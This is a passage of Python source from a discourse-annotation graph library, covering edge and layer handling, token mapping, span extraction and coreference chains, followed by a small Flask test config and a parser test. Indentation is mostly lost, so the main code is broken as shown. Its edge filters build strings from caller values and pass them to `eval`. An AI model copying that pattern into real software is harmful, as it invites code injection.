NetworkX algorithms designed for weighted graphs cannot use
multigraphs directly because it is not clear how to handle
multiedge weights. Convert to Graph using edge attribute
'weight' to enable weighted graph algorithms.
Examples
--------
>>> from discoursegraphs import DiscourseDocumentGraph
>>> d = DiscourseDocumentGraph()
>>> d.add_nodes_from([(1, {'layers':{'token'}, 'word':'hello'}), \
(2, {'layers':{'token'}, 'word':'world'})])
>>> d.edges(data=True)
>>> []
>>> d.add_edge(1, 2, layers={'generic'})
>>> d.add_edge(1, 2, layers={'tokens'}, weight=0.7)
>>> d.edges(data=True)
[(1, 2, {'layers': {'generic'}}),
(1, 2, {'layers': {'tokens'}, 'weight': 0.7})]
>>> d.edge[1][2]
{0: {'layers': {'generic'}}, 1: {'layers': {'tokens'}, 'weight': 0.7}}
>>> d.add_edge(1, 2, layers={'tokens'}, key=1, weight=1.0)
>>> d.edges(data=True)
[(1, 2, {'layers': {'generic'}}),
(1, 2, {'layers': {'tokens'}, 'weight': 1.0})]
>>> d.add_edge(1, 2, layers={'foo'}, key=1, weight=1.0)
>>> d.edges(data=True)
[(1, 2, {'layers': {'generic'}}),
(1, 2, {'layers': {'foo', 'tokens'}, 'weight': 1.0})]
"""
if not layers:
layers = {self.ns}
assert isinstance(layers, set), \
"'layers' parameter must be given as a set of strings."
assert all((isinstance(layer, str) for layer in layers)), \
"All elements of the 'layers' set must be strings."
# add layers to keyword arguments dict
attr.update({'layers': layers})
# set up attribute dict
if attr_dict is None:
attr_dict = attr
else:
try:
attr_dict.update(attr)
except AttributeError as e:
raise AttributeError("The attr_dict argument must be "
"a dictionary: ".format(e))
for node in (u, v): # u = source, v = target
if node not in self.nodes_iter():
self.add_node(node, layers={self.ns})
if v in self.succ[u]: # if there's already an edge from u to v
keydict = self.adj[u][v]
if key is None: # creating additional edge
# find a unique integer key
# other methods might be better here?
key = len(keydict)
while key in keydict:
key += 1
datadict = keydict.get(key, {}) # works for existing & new edge
existing_layers = datadict.get('layers', set())
all_layers = existing_layers.union(layers)
datadict.update(attr_dict)
datadict.update({'layers': all_layers})
keydict[key] = datadict
else: # there's no edge between u and v, yet
# selfloops work this way without special treatment
if key is None:
key = 0
datadict = {}
datadict.update(attr_dict) # includes layers
keydict = {key: datadict}
self.succ[u][v] = keydict
self.pred[v][u] = keydict
def add_edges_from(self, ebunch, attr_dict=None, **attr):
"""Add all the edges in ebunch.
Parameters
----------
ebunch : container of edges
Each edge given in the container will be added to the
graph. The edges can be:
- 3-tuples (u,v,d) for an edge attribute dict d, or
- 4-tuples (u,v,k,d) for an edge identified by key k
Each edge must have a layers attribute (set of str).
attr_dict : dictionary, optional (default= no attributes)
Dictionary of edge attributes. Key/value pairs will
update existing data associated with each edge.
attr : keyword arguments, optional
Edge data (or labels or objects) can be assigned using
keyword arguments.
See Also
--------
add_edge : add a single edge
Notes
-----
Adding the same edge twice has no effect but any edge data
will be updated when each duplicate edge is added.
An edge can only be added if the source and target nodes are
already present in the graph. This decision was taken to ensure
that all edges are associated with at least one (meaningful)
layer.
Edge attributes specified in edges as a tuple (in ebunch) take
precedence over attributes specified otherwise (in attr_dict or
attr). Layers can only be added (via a 'layers' edge attribute),
but not overwritten.
Examples
--------
>>> d = DiscourseDocumentGraph()
>>> d.add_node(1, {'int'})
>>> d.add_node(2, {'int'})
>>> d.add_edges_from([(1, 2, {'layers': {'int'}, 'weight': 23})])
>>> d.add_edges_from([(1, 2, {'layers': {'int'}, 'weight': 42})])
>>> d.edges(data=True) # multiple edges between the same nodes
[(1, 2, {'layers': {'int'}, 'weight': 23}),
(1, 2, {'layers': {'int'}, 'weight': 42})]
Associate data to edges
We update the existing edge (key=0) and overwrite its 'weight'
value. Note that we can't overwrite the 'layers' value, though.
Instead, they are added to the set of existing layers
>>> d.add_edges_from([(1, 2, 0, {'layers':{'number'}, 'weight':66})])
[(1, 2, {'layers': {'int', 'number'}, 'weight': 66}),
(1, 2, {'layers': {'int'}, 'weight': 42})]
"""
# set up attribute dict
if attr_dict is None:
attr_dict = attr
else:
try:
attr_dict.update(attr)
except AttributeError as e:
raise AttributeError("The attr_dict argument must be "
"a dictionary: ".format(e))
# process ebunch
for e in ebunch:
ne = len(e)
if ne == 4:
u, v, key, dd = e
elif ne == 3:
u, v, dd = e
key = None
else:
raise AttributeError(
"Edge tuple {0} must be a 3-tuple (u,v,attribs) "
"or 4-tuple (u,v,key,attribs).".format(e))
if not 'layers' in dd:
dd['layers'] = {self.ns}
layers = dd['layers']
assert isinstance(layers, set), \
"'layers' must be specified as a set of strings."
assert all((isinstance(layer, str)
for layer in layers)), \
"All elements of the 'layers' set must be strings."
additional_layers = attr_dict.get('layers', {})
if additional_layers:
assert isinstance(additional_layers, set), \
"'layers' must be specified as a set of strings."
assert all((isinstance(layer, str)
for layer in additional_layers)), \
"'layers' set must only contain strings."
# union of layers specified in ebunch tuples,
# attr_dict and **attr
new_layers = layers.union(additional_layers)
if u in self.adj: # edge with u as source already exists
keydict = self.adj[u].get(v, {})
else:
keydict = {}
if key is None:
# find a unique integer key
# other methods might be better here?
key = len(keydict)
while key in keydict:
key += 1
datadict = keydict.get(key, {}) # existing edge attribs
existing_layers = datadict.get('layers', set())
datadict.update(attr_dict)
datadict.update(dd)
updated_attrs = {k: v for (k, v) in datadict.items()
if k != 'layers'}
all_layers = existing_layers.union(new_layers)
# add_edge() checks if u and v exist, so we don't need to
self.add_edge(u, v, layers=all_layers, key=key,
attr_dict=updated_attrs)
def add_layer(self, element, layer):
"""
add a layer to an existing node or edge
Parameters
----------
element : str, int, (str/int, str/int)
the ID of a node or edge (source node ID, target node ID)
layer : str
the layer that the element shall be added to
"""
assert isinstance(layer, str), "Layers must be strings!"
if isinstance(element, tuple): # edge repr. by (source, target)
assert len(element) == 2
assert all(isinstance(node, (str, int)) for node in element)
source_id, target_id = element
# this class is based on a multi-digraph, so we'll have to iterate
# over all edges between the two nodes (even if there's just one)
edges = self.edge[source_id][target_id]
for edge in edges:
existing_layers = edges[edge]['layers']
existing_layers.add(layer)
edges[edge]['layers'] = existing_layers
if isinstance(element, (str, int)): # node
existing_layers = self.node[element]['layers']
existing_layers.add(layer)
self.node[element]['layers'] = existing_layers
def get_token(self, token_node_id, token_attrib='token'):
"""
given a token node ID, returns the token unicode string.
Parameters
----------
token_node_id : str
the ID of the token node
token_attrib : str
name of the node attribute that contains the token string as its
value (default: token).
Returns
-------
token : unicode
the token string
"""
return self.node[token_node_id][self.ns+':'+token_attrib]
def get_tokens(self, token_attrib='token', token_strings_only=False):
"""
returns a list of (token node ID, token) which represent the tokens
of the input document (in the order they occur).
Parameters
----------
token_attrib : str
name of the node attribute that contains the token string as its
value (default: token).
Yields
-------
result : generator of (str, unicode) or generator unicode
a generator of (token node ID, token string) tuples if
token_strings_only==False, a generator of token strings otherwise
"""
if token_strings_only:
for token_id in self.tokens:
yield self.get_token(token_id, token_attrib)
else:
for token_id in self.tokens:
yield (token_id, self.get_token(token_id, token_attrib))
def merge_graphs(self, other_docgraph, verbose=False):
"""
Merges another document graph into the current one, thereby adding all
the necessary nodes and edges (with attributes, layers etc.).
NOTE: This will only work if both graphs have exactly the same
tokenization.
"""
# keep track of all merged/old root nodes in case we need to
# delete them or their attributes (e.g. 'metadata')
if hasattr(self, 'merged_rootnodes'):
self.merged_rootnodes.append(other_docgraph.root)
else:
self.merged_rootnodes = [other_docgraph.root]
# renaming the tokens of the other graph to match this one
rename_tokens(other_docgraph, self, verbose=verbose)
self.add_nodes_from(other_docgraph.nodes(data=True))
# copy token node attributes to the current namespace
for node_id, node_attrs in other_docgraph.nodes(data=True):
if istoken(other_docgraph, node_id) and \
self.ns+':token' not in self.node[node_id]:
self.node[node_id].update({self.ns+':token': other_docgraph.get_token(node_id)})
self.add_edges_from(other_docgraph.edges(data=True))
# workaround for issues #89 and #96
# copy the token node IDs / sentence node IDs from the other graph,
# if this graph doesn't have such lists, yet
if other_docgraph.name and not self.name:
self.name = other_docgraph.name
if other_docgraph.tokens and not self.tokens:
self.tokens = other_docgraph.tokens
if other_docgraph.sentences and not self.sentences:
self.sentences = other_docgraph.sentences
# there should be no dangling, unused root nodes in a merged graph
self.merge_rootnodes(other_docgraph)
def merge_rootnodes(self, other_docgraph):
"""
Copy all the metadata from the root node of the other graph into this
one. Then, move all edges belonging to the other root node to this
one. Finally, remove the root node of the other graph from this one.
"""
# copy metadata from other graph, cf. #136
if 'metadata' in other_docgraph.node[other_docgraph.root]:
other_meta = other_docgraph.node[other_docgraph.root]['metadata']
self.node[self.root]['metadata'].update(other_meta)
assert not other_docgraph.in_edges(other_docgraph.root), \
"root node in graph '{}' must not have any ingoing edges".format(
other_docgraph.name)
for (root, target, attrs) in other_docgraph.out_edges(
other_docgraph.root, data=True):
self.add_edge(self.root, target, attr_dict=attrs)
self.remove_node(other_docgraph.root)
def add_precedence_relations(self):
"""
add precedence relations to the document graph (i.e. an edge from the
root node to the first token node, an edge from the first token node to
the second one etc.)
"""
assert len(self.tokens) > 1, \
"There are no tokens to add precedence relations to."
self.add_edge(self.root, self.tokens[0],
layers={self.ns, self.ns+':precedence'},
edge_type=EdgeTypes.precedence_relation)
for i, token_node_id in enumerate(self.tokens[1:]):
# edge from token_n to token_n+1
self.add_edge(self.tokens[i], token_node_id,
layers={self.ns, self.ns+':precedence'},
edge_type=EdgeTypes.precedence_relation)
def rename_tokens(docgraph_with_old_names, docgraph_with_new_names, verbose=False):
"""
Renames the tokens of a graph (``docgraph_with_old_names``) in-place,
using the token names of another document graph
(``docgraph_with_new_names``). Also updates the ``.tokens`` list of the old
graph.
This will only work, iff both graphs have the same tokenization.
"""
old2new = create_token_mapping(docgraph_with_old_names,
docgraph_with_new_names, verbose=verbose)
# save the mappings from old to new token node IDs in the `renamed_nodes`
# attribute of the merged graph
if hasattr(docgraph_with_new_names, 'renamed_nodes'):
docgraph_with_new_names.renamed_nodes.update(old2new)
else:
docgraph_with_new_names.renamed_nodes = old2new
relabel_nodes(docgraph_with_old_names, old2new, copy=False)
    new_token_ids = list(old2new.values())
# new_token_ids could be empty (if docgraph_with_new_names is still empty)
if new_token_ids:
docgraph_with_old_names.tokens = new_token_ids
def create_token_mapping(docgraph_with_old_names, docgraph_with_new_names,
verbose=False):
"""
given two document graphs which annotate the same text and which use the
same tokenization, creates a dictionary with a mapping from the token
IDs used in the first graph to the token IDs used in the second graph.
Parameters
----------
docgraph_with_old_names : DiscourseDocumentGraph
a document graph with token IDs that will be replaced later on
docgraph_with_new_names : DiscourseDocumentGraph
a document graph with token IDs that will replace the token IDs
used in ``docgraph_with_old_names`` later on
Returns
-------
old2new : dict
maps from a token ID used in ``docgraph_with_old_names`` to the token
ID used in ``docgraph_with_new_names`` to reference the same token
"""
def kwic_string(docgraph, keyword_index):
tokens = [tok for (tokid, tok) in list(docgraph.get_tokens())]
before, keyword, after = get_kwic(tokens, keyword_index)
return "{0} (Index: {1}): {2} [[{3}]] {4}\n".format(
docgraph.name, keyword_index, ' '.join(before), keyword,
' '.join(after))
# generators of (token ID, token) tuples
old_token_gen = docgraph_with_old_names.get_tokens()
new_token_gen = docgraph_with_new_names.get_tokens()
old2new = {}
for i, (new_tok_id, new_tok) in enumerate(new_token_gen):
        old_tok_id, old_tok = next(old_token_gen)
if new_tok != old_tok: # token mismatch
if verbose:
raise ValueError(u"Tokenization mismatch:\n{0}{1}".format(
kwic_string(docgraph_with_old_names, i),
kwic_string(docgraph_with_new_names, i)))
raise ValueError(
u"Tokenization mismatch: {0} ({1}) vs. {2} ({3})\n"
"\t{4} != {5}".format(
docgraph_with_new_names.name, docgraph_with_new_names.ns,
docgraph_with_old_names.name, docgraph_with_old_names.ns,
new_tok, old_tok).encode('utf-8'))
else:
old2new[old_tok_id] = new_tok_id
return old2new
def get_kwic(tokens, index, context_window=5):
"""
keyword in context
Parameters
----------
tokens : list of str
a text represented as a list of tokens
index : int
the index of the keyword in the token list
context_window : int
the number of preceding/succeding words of the keyword to be
retrieved
Returns
-------
before : list of str
the tokens preceding the keyword
keyword : str
the token at the index position
after : list of str
the tokens succeding the keyword
"""
text_length = len(tokens)
start_before = max(0, index-context_window)
end_before = max(0, index)
before = tokens[start_before:end_before]
start_after = min(text_length, index+1)
end_after = min(text_length, index+context_window+1)
after = tokens[start_after:end_after]
return before, tokens[index], after
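# Illustrative example of get_kwic on a toy token list:
#
#     >>> get_kwic(['a', 'b', 'c', 'd', 'e'], 2, context_window=1)
#     (['b'], 'c', ['d'])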
def get_annotation_layers(docgraph):
"""
    WARNING: this is highly inefficient!
Fix this via Issue #36.
Returns
-------
all_layers : set or dict
the set of all annotation layers used in the given graph
"""
node_layers = get_node_annotation_layers(docgraph)
return node_layers.union(get_edge_annotation_layers(docgraph))
def get_top_level_layers(docgraph):
"""
    WARNING: this is highly inefficient!
Fix this via Issue #36.
Returns
-------
top_level_layers : set
the set of all top level annotation layers used in the given graph
(e.g. 'tiger' or 'rst', but not 'tiger:sentence:root' or 'rst:segment')
"""
return set(layer.split(':')[0]
for layer in get_annotation_layers(docgraph))
def get_node_annotation_layers(docgraph):
"""
    WARNING: this is highly inefficient!
    Fix this via Issue #36.
    Returns
    -------
    all_layers : set
the set of all annotation layers used for annotating nodes in the given
graph
"""
all_layers = set()
for node_id, node_attribs in docgraph.nodes_iter(data=True):
for layer in node_attribs['layers']:
all_layers.add(layer)
return all_layers
def get_edge_annotation_layers(docgraph):
"""
    WARNING: this is highly inefficient!
    Fix this via Issue #36.
    Returns
    -------
    all_layers : set
the set of all annotation layers used for annotating edges in the given
graph
"""
all_layers = set()
for source_id, target_id, edge_attribs in docgraph.edges_iter(data=True):
for layer in edge_attribs['layers']:
all_layers.add(layer)
return all_layers
def get_span_offsets(docgraph, node_id):
"""
returns the character start and end position of the span of text that
the given node spans or dominates.
Returns
-------
offsets : tuple(int, int)
character onset and offset of the span
"""
try:
span = get_span(docgraph, node_id)
# workaround for issue #138
# TODO: when #138 is fixed, just take the first onset / last offset
onsets, offsets = zip(*[docgraph.get_offsets(tok_node)
for tok_node in span])
return (min(onsets), max(offsets))
    except KeyError:
raise KeyError("Node '{}' doesn't span any tokens.".format(node_id))
def get_span(docgraph, node_id, debug=False):
"""
returns all the tokens that are dominated or in a span relation with
the given node. If debug is set to True, you'll get a warning if the
graph is cyclic.
Returns
-------
span : list of str
sorted list of token nodes (token node IDs)
"""
if debug is True and is_directed_acyclic_graph(docgraph) is False:
        warnings.warn(
            ("Can't reliably extract span '{0}' from the cyclic graph '{1}'. "
             "Maximum recursion depth may be exceeded.").format(node_id,
                                                                docgraph))
span = []
if docgraph.ns+':token' in docgraph.node[node_id]:
span.append(node_id)
for src_id, target_id, edge_attribs in docgraph.out_edges_iter(node_id,
data=True):
if src_id == target_id:
continue # ignore self-loops
# ignore pointing relations
if edge_attribs['edge_type'] != EdgeTypes.pointing_relation:
span.extend(get_span(docgraph, target_id))
return sorted(span, key=natural_sort_key)
def get_text(docgraph, node_id=None):
"""
returns the text (joined token strings) that the given node dominates
or spans. If no node ID is given, returns the complete text of the
document
"""
if node_id:
        tokens = (docgraph.node[span_node_id][docgraph.ns+':token']
                  for span_node_id in get_span(docgraph, node_id))
else:
tokens = (docgraph.node[token_id][docgraph.ns+':token']
for token_id in docgraph.tokens)
return ' '.join(tokens)
def tokens2text(docgraph, token_ids):
"""
    given a list of token node IDs, returns their string representation
(concatenated token strings).
"""
return ' '.join(docgraph.node[token_id][docgraph.ns+':token']
for token_id in token_ids)
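def _example_tokens2text():
    # Illustrative sketch, not part of the original module: a plain
    # networkx 1.x MultiDiGraph stands in for a DiscourseDocumentGraph,
    # since ``tokens2text`` only needs a ``.ns`` attribute and
    # '<namespace>:token' node attributes. The node IDs and namespace used
    # here are made up for the example.
    import networkx as nx
    g = nx.MultiDiGraph()
    g.ns = 'toy'
    g.add_node('t1', {'toy:token': u'hello'})
    g.add_node('t2', {'toy:token': u'world'})
    return tokens2text(g, ['t1', 't2'])  # u'hello world'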
def istoken(docgraph, node_id, namespace=None):
"""returns true, iff the given node ID belongs to a token node.
Parameters
----------
node_id : str
the node to be checked
namespace : str or None
If a namespace is given, only look for tokens in the given namespace.
Otherwise, look for tokens in the default namespace of the given
document graph.
"""
if namespace is None:
namespace = docgraph.ns
return namespace+':token' in docgraph.node[node_id]
def is_continuous(docgraph, dominating_node):
"""return True, if the tokens dominated by the given node are all adjacent"""
first_onset, last_offset = get_span_offsets(docgraph, dominating_node)
span_range = xrange(first_onset, last_offset+1)
token_offsets = (docgraph.get_offsets(tok)
for tok in get_span(docgraph, dominating_node))
char_positions = set(itertools.chain.from_iterable(xrange(on, off+1)
for on, off in token_offsets))
for item in span_range:
if item not in char_positions:
return False
return True
def select_neighbors_by_layer(docgraph, node, layer, data=False):
"""
    Get all neighboring nodes belonging to (any of) the given layer(s).
    A neighboring node is a node that the given node connects to via an
    outgoing edge.
Parameters
----------
    docgraph : DiscourseDocumentGraph
        document graph from which the nodes will be extracted
    node : str
        ID of the node whose neighbors will be inspected
    layer : str or collection of str
        name(s) of the layer(s) the neighbors must belong to
data : bool
If True, results will include node attributes.
Yields
------
nodes : generator of str or generator of (str, dict) tuple
If data is False (default), a generator of neighbor node IDs
that are present in the given layer. If data is True,
a generator of (node ID, node attrib dict) tuples.
"""
for node_id in docgraph.neighbors_iter(node):
node_layers = docgraph.node[node_id]['layers']
if isinstance(layer, (str, unicode)):
condition = layer in node_layers
else: # ``layer`` is a list/set/dict of layers
condition = any(l in node_layers for l in layer)
if condition:
yield (node_id, docgraph.node[node_id]) if data else (node_id)
def select_neighbors_by_edge_attribute(docgraph, source,
attribute=None, value=None, data=False):
"""Get all neighbors with the given edge attribute value(s)."""
assert isinstance(docgraph, MultiGraph)
for neighbor_id in docgraph.neighbors_iter(source):
edges = docgraph[source][neighbor_id].values()
if attribute is None:
has_attrib = True # don't filter neighbors
else:
has_attrib = any(attribute in edge for edge in edges)
if has_attrib:
if value is None:
has_value = True
elif isinstance(value, basestring):
has_value = any(edge.get(attribute) == value
for edge in edges)
else: # ``value`` is a list/set/dict of values
has_value = any(edge.get(attribute) == v
for edge in edges
for v in value)
if has_value:
if data:
yield (neighbor_id, docgraph.node[neighbor_id])
else:
yield neighbor_id
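def _example_select_neighbors_by_edge_attribute():
    # Illustrative sketch, not part of the original module: a bare
    # networkx 1.x MultiDiGraph is enough here, because only the multi-edge
    # attribute dicts and ``neighbors_iter`` are touched when data=False.
    # The edge_type values are toy strings; real document graphs use the
    # constants defined in ``EdgeTypes``.
    import networkx as nx
    g = nx.MultiDiGraph()
    g.add_edge('m2', 'm1', edge_type='points_to')
    g.add_edge('m2', 's1', edge_type='spans')
    return list(select_neighbors_by_edge_attribute(
        g, 'm2', attribute='edge_type', value='points_to'))  # ['m1']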
def select_nodes_by_layer(docgraph, layer=None, data=False):
"""
Get all nodes belonging to (any of) the given layer(s).
Parameters
----------
docgraph : DiscourseDocumentGraph
document graph from which the nodes will be extracted
layer : str or collection of str or None
name(s) of the layer(s) to select nodes from. If None, returns all
nodes
data : bool
If True, results will include node attributes.
Yields
------
nodes : generator of str or generator of (str, dict) tuple
If data is False (default), a generator of node IDs that are present in
the given layer. If data is True, a generator of (node ID, node attrib
dict) tuples.
"""
for node_id, node_attribs in docgraph.nodes_iter(data=True):
if layer is None:
condition = True # don't filter nodes
elif isinstance(layer, (str, unicode)):
condition = layer in node_attribs['layers']
else: # ``layer`` is a list/set/dict of layers
condition = any(l in node_attribs['layers'] for l in layer)
if condition:
if data:
yield (node_id, node_attribs)
else:
yield node_id
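def _example_select_nodes_by_layer():
    # Illustrative sketch, not part of the original module: any graph whose
    # nodes carry a 'layers' attribute works, so a plain networkx 1.x
    # MultiDiGraph (which provides ``nodes_iter``) is used as a stand-in.
    import networkx as nx
    g = nx.MultiDiGraph()
    g.add_node('s1', layers={'tiger', 'tiger:sentence'})
    g.add_node('t1', layers={'tiger', 'tiger:token'})
    g.add_node('m1', layers={'mmax', 'mmax:markable'})
    return sorted(select_nodes_by_layer(g, layer='tiger'))  # ['s1', 't1']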
def select_nodes_by_attribute(docgraph, attribute=None, value=None, data=False):
"""
Get all nodes with the given attribute (and attribute value).
Parameters
----------
docgraph : DiscourseDocumentGraph
document graph from which the nodes will be extracted
attribute : str or None
        Name of the node attribute that all nodes must possess.
        If None, returns all nodes.
    value : str or collection of str or None
        Value of the node attribute that all nodes must possess.
        If None, returns all nodes with the given node attribute key.
data : bool
If True, results will include node attributes.
Yields
------
nodes : generator of str or generator of (str, dict) tuple
        If data is False (default), a generator of node IDs that possess
the given attribute. If data is True, a generator of (node ID,
node attrib dict) tuples.
"""
for node_id, node_attribs in docgraph.nodes_iter(data=True):
if attribute is None:
has_attrib = True # don't filter nodes
else:
has_attrib = attribute in node_attribs
if has_attrib:
if value is None:
has_value = True
elif isinstance(value, basestring):
has_value = node_attribs.get(attribute) == value
else: # ``value`` is a list/set/dict of values
has_value = any(node_attribs.get(attribute) == v for v in value)
if has_value:
if data:
yield (node_id, node_attribs)
else:
yield node_id
def select_edges(docgraph, conditions, data):
"""yields all edges that meet the conditions given as eval strings"""
for (src_id, target_id, edge_attribs) in docgraph.edges(data=True):
# if all conditions are fulfilled
# we need to add edge_attribs to the namespace eval is working in
if all((eval(cond, {'edge_attribs': edge_attribs})
for cond in conditions)):
if data:
yield (src_id, target_id, edge_attribs)
else:
yield (src_id, target_id)
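def _example_select_edges_conditions():
    # Illustrative sketch, not part of the original module: the condition
    # strings passed to ``select_edges`` are evaluated with the edge's
    # attribute dict bound to the name ``edge_attribs``. The attribute
    # values below are toy examples.
    edge_attribs = {'layers': {'tiger'}, 'edge_type': 'dominates'}
    conditions = ["'tiger' in edge_attribs['layers']",
                  "edge_attribs['edge_type'] == 'dominates'"]
    return all(eval(cond, {'edge_attribs': edge_attribs})
               for cond in conditions)  # True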
def select_edges_by_attribute(docgraph, attribute=None, value=None, data=False):
"""
    Get all edges with the given edge attribute (and attribute value).
    Parameters
    ----------
    docgraph : DiscourseDocumentGraph
        document graph from which the edges will be extracted
    attribute : str or None
        Name of the edge attribute that all edges must possess.
        If None, returns all edges.
    value : str or collection of str or None
        Value of the edge attribute that all edges must possess.
        If None, returns all edges with the given edge attribute key.
data : bool
If True, results will include edge attributes.
Returns
-------
    edges : generator of tuple
        a generator of edges, each represented as a (source node ID, target
        node ID) tuple. If data is True, edges are represented as
        (source node ID, target node ID, edge attribute dict) tuples.
"""
if attribute:
attrib_key_eval = "'{}' in edge_attribs".format(attribute)
if value is not None:
if isinstance(value, basestring):
attrib_val_eval = \
"edge_attribs['{0}'] == '{1}'".format(attribute, value)
return select_edges(
docgraph, data=data,
conditions=[attrib_key_eval, attrib_val_eval])
else: # ``value`` is a list/set/dict of values
attrib_val_evals = \
["edge_attribs['{0}'] == '{1}'".format(attribute, v)
for v in value]
results = \
[select_edges(docgraph, data=data,
conditions=[attrib_key_eval, val_eval])
for val_eval in attrib_val_evals]
# results is a list of generators
return itertools.chain(*results)
else: # yield all edges with the given attribute, regardless of value
return select_edges(docgraph, data=data, conditions=[attrib_key_eval])
else: # don't filter edges at all
return docgraph.edges_iter(data=data)
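def _example_select_edges_by_attribute():
    # Illustrative sketch, not part of the original module: filtering the
    # edges of a toy networkx 1.x MultiDiGraph by a single attribute value.
    # The edge_type values are made-up strings for the example.
    import networkx as nx
    g = nx.MultiDiGraph()
    g.add_edge('m2', 'm1', edge_type='points_to')
    g.add_edge('s1', 't1', edge_type='spans')
    return list(select_edges_by_attribute(
        g, attribute='edge_type', value='points_to'))  # [('m2', 'm1')]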
def select_edges_by(docgraph, layer=None, edge_type=None, data=False):
"""
    Get all edges with the given edge type and layer.
Parameters
----------
docgraph : DiscourseDocumentGraph
        document graph from which the edges will be extracted
    layer : str or None
        name of the layer the edges must belong to. If None, edges are not
        filtered by layer.
    edge_type : str or None
        Type of the edges to be extracted (edge types are defined in the
        ``EdgeTypes`` enum). If None, edges are not filtered by type.
data : bool
If True, results will include edge attributes.
Returns
-------
    edges : generator of tuple
        a generator of edges, each represented as a (source node ID, target
        node ID) tuple. If data is True, edges are represented as
        (source node ID, target node ID, edge attribute dict) tuples.
"""
edge_type_eval = "edge_attribs['edge_type'] == '{}'".format(edge_type)
layer_eval = "'{}' in edge_attribs['layers']".format(layer)
if layer is not None:
if edge_type is not None:
return select_edges(docgraph, data=data,
conditions=[edge_type_eval, layer_eval])
else: # filter by layer, but not by edge type
return select_edges(docgraph, conditions=[layer_eval], data=data)
else: # don't filter layers
if edge_type is not None: # filter by edge type, but not by layer
return select_edges(docgraph, data=data,
conditions=[edge_type_eval])
else: # neither layer, nor edge type is filtered
return docgraph.edges_iter(data=data)
def __walk_chain(rel_dict, src_id):
"""
given a dict of pointing relations and a start node, this function
will return a list of paths (each path is represented as a list of
node IDs -- from the first node of the path to the last).
Parameters
----------
rel_dict : dict
a dictionary mapping from an edge source node (node ID str)
to a set of edge target nodes (node ID str)
    src_id : str
        the node ID at which all returned paths start
    Returns
    -------
    paths_starting_with_id : list of list of str
        each element is a list of node IDs representing one chain of
        pointing relations, starting at ``src_id``
"""
paths_starting_with_id = []
for target_id in rel_dict[src_id]:
if target_id in rel_dict:
for tail in __walk_chain(rel_dict, target_id):
paths_starting_with_id.append([src_id] + tail)
else:
paths_starting_with_id.append([src_id, target_id])
return paths_starting_with_id
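def _example_walk_chain():
    # Illustrative sketch, not part of the original module: 'm4' points to
    # two antecedents, one of which points further back, so two paths are
    # returned (their order depends on set iteration order).
    rel_dict = {'m4': {'m3', 'm1'}, 'm3': {'m2'}}
    paths = __walk_chain(rel_dict, 'm4')
    # sorted(paths) == [['m4', 'm1'], ['m4', 'm3', 'm2']]
    return paths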
def get_pointing_chains(docgraph, layer=None):
"""
returns a list of chained pointing relations (e.g. coreference chains)
found in the given document graph.
Parameters
----------
docgraph : DiscourseDocumentGraph
a text with annotations, represented by a document graph
layer : str or None
        If a layer is specified, this function will only return pointing
        relations belonging to that layer.
"""
pointing_relations = select_edges_by(docgraph, layer=layer,
edge_type=EdgeTypes.pointing_relation)
# a markable can point to more than one antecedent, cf. Issue #40
rel_dict = defaultdict(set)
for src_id, target_id in pointing_relations:
rel_dict[src_id].add(target_id)
all_chains = [__walk_chain(rel_dict, src_id)
for src_id in rel_dict.iterkeys()]
    # don't return partial chains: if [a,b,c,d] is a chain, don't also
    # return its suffixes, e.g. [b,c,d] or [c,d]
unique_chains = []
for i, src_id_chains in enumerate(all_chains):
        # there is at least one chain in this list, and every chain in it
        # starts with the same source node ID
src_id = src_id_chains[0][0]
# chain lists not starting with src_id
other_chainlists = all_chains[:i] + all_chains[i+1:]
if not any((src_id in chain
for chain_list in other_chainlists
for chain in chain_list)):
unique_chains.extend(src_id_chains)
return unique_chains
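def _example_pointing_chain_deduplication():
    # Illustrative sketch, not part of the original module: with these toy
    # pointing relations, ``__walk_chain`` produces the full chain starting
    # at 'm3' as well as its suffix starting at 'm2'; the deduplication step
    # in ``get_pointing_chains`` would keep only ['m3', 'm2', 'm1'].
    rel_dict = {'m3': {'m2'}, 'm2': {'m1'}}
    all_chains = [__walk_chain(rel_dict, src) for src in rel_dict]
    # all_chains contains [['m3', 'm2', 'm1']] and [['m2', 'm1']]
    # (in arbitrary dict order)
    return all_chains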
def layer2namespace(layer):
"""
converts the name of a layer into the name of its namespace, e.g.
'mmax:token' --> 'mmax'
"""
return layer.split(':')[0]
|
"""Configuration for running the test suite."""
from .base import BaseConfig
class TestingConfig(BaseConfig):
"""Uses an in-memory sqlite database for running tests."""
# NOTE: Flask ignores variables unless they are in all caps
TESTING = True
# DATABASE CONFIGURATION
SQLALCHEMY_DATABASE_URI = 'sqlite://'
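def _example_create_test_app():
    # A minimal sketch (an assumption, not part of this config module) of
    # how the testing config might be applied in a Flask application
    # factory; the function name is made up for illustration.
    from flask import Flask
    app = Flask(__name__)
    app.config.from_object(TestingConfig)
    assert app.config['TESTING'] is True
    return app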
|
# -*- coding: utf-8 -*-
from supar import Parser
import supar
def test_parse():
sentence = ['The', 'dog', 'chases', 'the', 'cat', '.']
for name in supar.PRETRAINED:
parser = Parser.load(name)
parser.predict([sentence], prob=True)
|